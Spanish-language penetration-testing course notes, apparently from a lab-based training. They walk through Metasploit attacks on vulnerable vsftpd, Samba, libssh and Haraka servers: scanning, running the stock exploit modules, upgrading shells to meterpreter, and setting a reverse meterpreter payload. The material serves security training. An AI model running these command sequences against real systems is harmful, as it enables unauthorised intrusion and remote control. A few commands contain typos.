Linux Exploitation
Exploiting A Vulnerable FTP Server
Exploiting FTP
FTP (File Transfer Protocol) es un protocolo que utiliza el puerto TCP 21 y se utiliza para facilitar el intercambio de archivos entre un servidor y un cliente o clientes.
También se utiliza con frecuencia como medio para transferir archivos hacia y desde el directorio de un servidor web.
vsftpd es un servidor FTP para sistemas tipo Unix, incluidos los sistemas Linux, y es el servidor FTP predeterminado para Ubuntu, CentOS y Fedora.
vsftpd V2.3.4 es vulnerable a una vulnerabilidad de ejecución de comandos que se ve facilitada por un backdoor malicioso que se agregó al archivo de descarga de vsftpd a través de un ataque a la cadena de suministro.
Demo: Exploiting A Vulnerable FTP Server
msf5 > workspace -a vsftpd2.3.4
msf5 > setg RHOSTS 192.209.183.3
msf5 > db_nmap -sS -sV -O 192.209.183.3
msf5 > services
msf5 > vulns
msf5 > analize # No funciona en todos los casos
msf5 > search vsftpd
msf5 > use exploit/unix/ftp/vsftpd_234_backoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
/bin/bash i
ctrl+z
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell to meterpreter) > show options
# Este modulo requiere
# 1. Acceso al sistema destino
# 2. El acceso debe de ser dado por una sesion
msf5 post(multi/manage/shell to meterpreter) > run
msf5 post(multi/manage/shell to meterpreter) > sessions
# Ingresar a la sesion que se abrio
# Es normal ver un error en la ejecucion del comando
# INGRESAR A LA SESION QUE SE CREO
Quiz: Exploiting A Vulnerable FTP Server

Exploiting Samba
SMB (Server Message Block) es un protocolo de intercambio de archivos de red que se utiliza para facilitar el intercambio de archivos y periféricos entre equipos en una red local (LAN).
SMB utiliza el puerto 445 (TCP). Sin embargo, originalmente, SMB se ejecutaba sobre NetBIOS utilizando el puerto 139.
Samba es la implementación de SMB para Linux y permite que los sistemas Windows accedan a recursos compartidos y dispositivos Linux.
Samba V3.5.0 es vulnerable a una vulnerabilidad de ejecución de código remoto, lo que permite que un cliente malintencionado cargue una libreria compartida en un recurso compartido escribible y luego haga que el servidor la cargue y la ejecute.
Demo: Exploiting Samba
msf5 > workspace -a samba
msf5 > setg RHOSTS 192.18.76.3
msf5 > db_nmap -sS -sV -O 192.18.76.3
msf5 > search type:exploit name:samba
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
# Ejecute el siguiente comando para verificar aplica el exploit
msf5 exploit(linux/samba/is_known_pipename) > check
msf5 exploit(linux/samba/is_known_pipename) > info
msf5 exploit(linux/samba/is_known_pipename) > run
# Abrira una sesion meterpreter
# Mejorar la sesion meterpreter en caso de no tener una visibilidad buena
ctrl+z
msf5 exploit(linux/samba/is_known_pipename) > sessions
msf5 exploit(linux/samba/is_known_pipename) > search shell_to_meterpreter
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell to meterpreter) > show options
msf5 post(multi/manage/shell to meterpreter) > set LHOST eth1
msf5 post(multi/manage/shell to meterpreter) > set SESSION 1
msf5 post(multi/manage/shell to meterpreter) > run
msf5 post(multi/manage/shell to meterpreter) > sessions
msf5 post(multi/manage/shell to meterpreter) > sessions 2
Quiz: Exploiting Samba

Exploiting A Vulnerable SSH Server
Exploiting SSH
SSH (Secure Shell) es un protocolo de administración remota que ofrece cifrado y es el sucesor de Telnet. Se utiliza normalmente para el acceso remoto a servidores y sistemas.
SSH utiliza el puerto TCP 22 de forma predeterminada, sin embargo, al igual que otros servicios, se puede configurar para utilizar cualquier otro puerto TCP abierto.
libssh es una biblioteca C multiplataforma que implementa el protocolo SSHv2 en el lado del cliente y del servidor.
libssh VO.6.O-O.8.O es vulnerable a una vulnerabilidad de omisión de autenticación en el código del servidor libssh que se puede explotar para ejecutar comandos en el servidor de destino.
Demo: Exploiting A Vulnerable SSH Server
msf5 > workspace -a libssh
msf5 > setg RHOSTS 192.40.32.31
msf5 > db_nmap -ss -sv -o 192.40.32.31
msf5 > services
msf5 > search libssh_auth_bypass
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > show options
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set SPAWN_PTY true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions 1
# Convertir la shell en interpreter
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > search shell_to_meterpreter
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell to_meterpreter) > show options
msf5 post(multi/manage/shell to_meterpreter) > set LHOST eth1
msf5 post(multi/manage/shell to_meterpreter) > set SESSION 1
msf5 post(multi/manage/shell to_meterpreter) > run
msf5 post(multi/manage/shell to_meterpreter) > sessions
msf5 post(multi/manage/shell to_meterpreter) > session 2
Quiz: Exploiting A Vulnerable SSH Server


Exploiting A Vulnerable SMTP Server
Exploiting SMTP
SMTP (Simple Mail Transfer Protocol) es un protocolo de comunicación que se utiliza para la transmisión de correo electrónico.
SMTP utiliza el puerto TCP 25 de forma predeterminada. También se puede configurar para que se ejecute en los puertos TCP 465 y 587.
Haraka es un servidor SMTP de alto rendimiento y código abierto desarrollado en Node.js.
El servidor SMTP Haraka incluye un complemento para procesar archivos adjuntos. Las versiones de Haraka anteriores a la 2.8.9 son vulnerables a la inyección de comandos.
Demo: Exploiting A Vulnerable SMTP Server
msf5 > workspace -a haraka
msf5 > setg RHOSTS 192.86.51.3
msf5 > setg rhost 192.86.51.3
msf5 > db_nmap -sV -O 192.86.51.3
msf5 > search type:exploit name:haraka
msf5 > use exploit/linux/smtp/haraka
msf5 exploit(linux/smtp/haraka) > show options
msf5 exploit(linux/smtp/haraka) > set SRVPORT 9898
msf5 exploit(linux/smtp/haraka) > set email_to root@attackdefense.test
msf5 exploit(linux/smtp/haraka) > set payload linux/x64/meterpreter_reverse_http
msf5 exploit(linux/smtp/haraka) > set LHOST ethl
msf5 exploit(linux/smtp/haraka) > run
Quiz: Exploiting A Vulnerable SMTP Server


Last updated